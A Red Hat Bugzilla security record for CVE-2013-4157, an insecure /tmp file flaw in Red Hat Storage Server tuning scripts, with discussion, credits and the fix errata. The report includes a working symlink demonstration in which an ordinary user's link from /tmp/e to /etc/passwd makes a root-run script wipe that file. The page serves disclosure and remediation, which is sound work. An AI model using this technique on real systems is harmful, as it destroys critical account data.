Bug 986516 (CVE-2013-4157) - CVE-2013-4157 Red Hat Storage Server 2.0: appliance-base / redhat-storage-server /tmp file creation vuln
Summary: CVE-2013-4157 Red Hat Storage Server 2.0: appliance-base / redhat-storage-ser...
Alias: CVE-2013-4157
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
Depends On: 986517 986518
Blocks: 986520
TreeView+ depends on / blocked
Reported: 2013-07-20 04:52 UTC by Kurt Seifried
Modified: 2019-09-29 13:06 UTC (History)
10 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Last Closed: 2013-09-04 18:48:25 UTC

Attachments (Terms of Use)

System ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2013:1205 normal SHIPPED_LIVE Low: Red Hat Storage 2.0 security, bug fix, and enhancement update #6 2013-09-04 22:09:23 UTC

Description Kurt Seifried 2013-07-20 04:52:15 UTC
Gowrishankar Rajaiyan (grajaiya@redhat.com) reports:

I found a potential security issue with 
redhat-storage-server-1.7.3-2.el6rhs.noarch previously known as 
appliance-base-1.7.3-1.el6rhs while verifying 
https://bugzilla.redhat.com/show_bug.cgi?id=910566. [Open URL] This issue also 
exists in the latest released version of RHS 
https://rhn.redhat.com/rhn/software/channel/downloads/Download.do?cid=14689 [Open URL]

Description: As part of /etc/tune-profiles/rhs-high-throughput/ktune.sh 
and /etc/tune-profiles/rhs-virtualization/ktune.sh
for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do

A file "e" is created in /tmp directory. This information is public at 
https://bugzilla.redhat.com/show_bug.cgi?id=910566#c13 [Open URL] (I set it to 
private now, not sure if that helps). So any normal user can create a 
softlink from /tmp/e to /etc/passwd. The tuned profiles are executed as 
root user, hence, exposes a security loop hole where in a normal user 
can wipe out /etc/passwd.

Please guide on how to proceed from here.

A demonstration is as follows:
As normal user:
[shanks@localhost ~]$ id
uid=500(shanks) gid=500(shanks) groups=500(shanks)
[shanks@localhost ~]$ cd /tmp/

[shanks@localhost tmp]$ ln -s /etc/passwd e
[shanks@localhost tmp]$ ls -l
total 4
lrwxrwxrwx 1 shanks shanks 11 Jul 19 12:49 e -> /etc/passwd
-rwx------. 1 root root 391 Jul 19 09:04 ks-script-QuMjt3
-rwxr-xr-x. 1 root root 0 Jul 19 09:04 ks-script-QuMjt3.log
-rw------- 1 root root 0 Jul 19 09:04 tmp.ta4401DZd7
-rw-------. 1 root root 0 Jul 19 08:54 yum.log
[shanks@localhost tmp]$

As root:
[root@localhost ~]# tuned-adm profile rhs-high-throughput
Reverting to saved sysctl settings: [ OK ]
Calling '/etc/ktune.d/tunedadm.sh stop': setting readahead to 128 on 
brick devices:
[ OK ]
Reverting to cfq elevator: dm-0 dm-1 [ OK ]
Stopping tuned: [ OK ]
Switching to profile 'rhs-high-throughput'
Applying ktune sysctl settings:
/etc/ktune.d/tunedadm.conf: [ OK ]
Calling '/etc/ktune.d/tunedadm.sh start': setting readahead to 65536 on 
brick devices:
[ OK ]
Applying sysctl settings from /etc/sysctl.conf
Applying deadline elevator: dm-0 dm-1 [ OK ]
Starting tuned: 'import site' failed; use -v for traceback
[ OK ]
[root@localhost ~]# cat /etc/passwd
[root@localhost ~]#

Comment 3 Kurt Seifried 2013-07-20 05:30:57 UTC
Also there appear to be more vulnerabilities:

/etc/tune-profiles/rhs-virtualization/ktune.sh:  bricklist='/tmp/local-bricks.list'
/etc/tune-profiles/rhs-virtualization/ktune.sh:  for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
/etc/tune-profiles/rhs-virtualization/ktune.sh:          done) 2>> /tmp/bricks.err
/etc/tune-profiles/rhs-virtualization/ktune.sh:          echo '* hard nofile 16384' ) > /tmp/limits.conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        mv /tmp/limits.conf $limits_conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        grep -v 'soft nofile' $limits_conf | grep -v 'hard nofile' > /tmp/limits.conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        mv /tmp/limits.conf $limits_conf
/etc/tune-profiles/rhs-high-throughput/ktune.sh:  bricklist='/tmp/local-bricks.list'
/etc/tune-profiles/rhs-high-throughput/ktune.sh:  for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
/etc/tune-profiles/rhs-high-throughput/ktune.sh:          done) 2>> /tmp/bricks.err

Comment 4 Murray McAllister 2013-09-04 11:34:45 UTC

These issues were discovered by Gowrishankar Rajaiyan of Red Hat and Kurt Seifried of the Red Hat Security Response Team.

Comment 5 errata-xmlrpc 2013-09-04 18:10:55 UTC
This issue has been addressed in following products:

  Red Hat Storage 2.0

Via RHSA-2013:1205 https://rhn.redhat.com/errata/RHSA-2013-1205.html

Note You need to log in before you can comment on or make changes to this bug.